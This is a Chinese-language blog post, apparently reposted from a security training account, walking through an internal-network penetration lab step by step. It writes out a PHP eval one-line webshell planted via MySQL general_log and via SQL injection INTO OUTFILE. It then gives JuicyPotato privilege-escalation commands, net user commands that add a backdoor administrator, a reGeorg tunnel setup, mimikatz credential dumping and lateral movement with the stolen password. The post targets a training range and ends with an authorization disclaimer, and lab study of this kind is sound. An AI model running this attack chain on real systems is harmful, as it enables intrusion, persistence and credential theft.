内网渗透(一)

admin 2023年4月30日02:52:50评论68 views字数 2270阅读7分34秒阅读模式
                     

学网安渗透

扫码加我吧

免费&进群

内网渗透(一)  
内网渗透(一)

Track安全社区投稿~  

千元稿费!还有保底奖励~

预备知识

什么是内网渗透?

在我们拿下目标服务器后,对其局域网进行攻击,比如提权、权限维持、数据提取

如何绕过1290安全性报错?

mysql日志法(root权限)

1.show variables like ‘%general%’; #查看配置
2.set global general_log = on; #开启general log模式
3.set global general_log_file = ‘/var/www/html/1.php’; #设置日志目录为shell地址
4.select ‘<?php eval($_REQUEST[8]);?>’ #写入shell

烂土豆的功能

能够自动拿取系统的最高权限,并且对windows全版本通杀,如果系统版本不兼容就可以指定系统 烂土豆.exe -p “whoami” -c{}

Regeorg功能

考虑一种场景,有两个主机A和B。其中主机A上运行了Web服务,且端口映射到公网,可以被网布人员访问,主机B是在网访问不到的。攻击者通过楼哦东在主机A上传了webshell,但同时又处于某些限制不能得到A的主机权限,这个时候也无法通过常规方法直接登录到主机B获取权限。
这个时候reGeorg在这个时候又了很大的作用,攻击者已经有了主机A的webshell权限,而主机A能够同主机B通信,那么在主机A上安装reGeorg工具,使得攻击者发出的请求能够通过A转达到B,而B的响应能够转达到攻击者。

内网渗透(一)

连接语法:
py -2 reGeorgSocksProxy.py -u 文件地址 -l 127.0.0.1 -p 端口

猕猴桃的作用

猕猴桃提权,并将密码通过纯明文的形式显示出来

碰撞的语法

privilege::debug 提神权限
log
sekurlsa::logopasswords 抓取密码

proxifier的作用

能够添加代理服务器,设置代理规则,只对某个进程进行代理,可以防止网络被影响。

靶场实战

一、判断是否存在sql注入
输入:id=1 and 1=2
结果:

内网渗透(一)

二、判断字段数
输入:id=1 order by 3
结果:字段数为2

内网渗透(一)

三、判断显错位
输入:id=1 and 1=2 union select 1,2
结果:显错位在第二位

内网渗透(一)

四、写入一句话木马
输入:id=1 and 1=2 union select 1,’<?php eval($_REQUEST[8])?>’ into outfile ‘C:phpStudyWWW1.php’(文件路径从网页报错获取)
结果:写入木马文件1.php

内网渗透(一)

五、菜刀连接并查看自己的权限
输入:whoami
结果:为test

内网渗透(一)

六、查看系统信息
输入:systeminfo
结果:获取了系统版本为Windows Server 2008 R2,并且是在虚拟机上运行的,且ip为10.0.1.4,并且有两个补丁

内网渗透(一)

七、使用烂土豆提权
前提:将烂土豆文件拖入到菜刀中,并改名为123.exe
输入:123.exe -p “whoami”
结果:提权成功

内网渗透(一)

八、查看3389端口是否开启
输入:netstat -ano
结果:开启

内网渗透(一)

九、将文件tunnel.nosocket.php拖入菜刀,并修改为It.php

内网渗透(一)

十、运行reGeorgSocksProxy.py 连接本机和目标主机
前提:安装了 urllib3(python -m pip install urllib3)
输入:py -2 reGeorgSocksProxy.py -u http://afsgr16-b1ferw.aqlab.cn/It.php -l 127.0.0.1 -p 10010
结果:开启本地端口10010,进行连接
(我使用的是pycharm中的终端)
内网渗透(一)

十一、使用proxifier代理

内网渗透(一)
(记得将default的动作改为direct,只添加mstsc.exe,其它的都删除)
内网渗透(一)

十二、创建新的管理用户以便有凭据进行远程连接
输入:123.exe -p “net user yy yy123321!/add”(这里对密码有要求,复杂一点点就好了)
输入:123.exe -p “net localgroup administrators yy/add”
结果:我的账号yy 密码 yy123321! 成功变为目标主机的管理员

内网渗透(一)

十三、将猕猴桃拖入菜刀

内网渗透(一)

十四、远程连接目标主机

内网渗透(一)

十五、使用猕猴桃碰撞密码
前提:使用管理员身份进行碰撞
输入:
1、privilege::debug
2、log
3、sekurlsa::logonpasswords
结果:获取密码为 woshifengge1.(别忘记有个点了)

内网渗透(一)

十六、查看主机网段信息

内网渗透(一)

十七、我们不断尝试远程连接10.0.1.0的所有内网ip
凭据:用户:Administrator 密码:woshifengge1.
结果:在10.0.1.8连接成功(这边建议不要想我一样,可以尝试s扫描器)获取flag

内网渗透(一)

申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,

所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.


内网渗透(一)

没看够~?欢迎关注!


分享本文到朋友圈,可以凭截图找老师领取

上千教程+工具+交流群+靶场账号

 

内网渗透(一)

 分享后扫码加我



回顾往期内容

Xray挂机刷漏洞

零基础学黑客,该怎么学?

网络安全人员必考的几本证书!

文库|内网神器cs4.0使用说明书

代码审计 | 这个CNVD证书拿的有点轻松

【精选】SRC快速入门+上分小秘籍+实战指南

    代理池工具撰写 | 只有无尽的跳转,没有封禁的IP!

内网渗透(一)

点赞+在看支持一下吧~感谢看官老爷~ 

你的点赞是我更新的动力

原文始发于微信公众号(掌控安全EDU):内网渗透(一)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年4月30日02:52:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   内网渗透(一)http://cn-sec.com/archives/1700519.html

发表评论

匿名网友 填写信息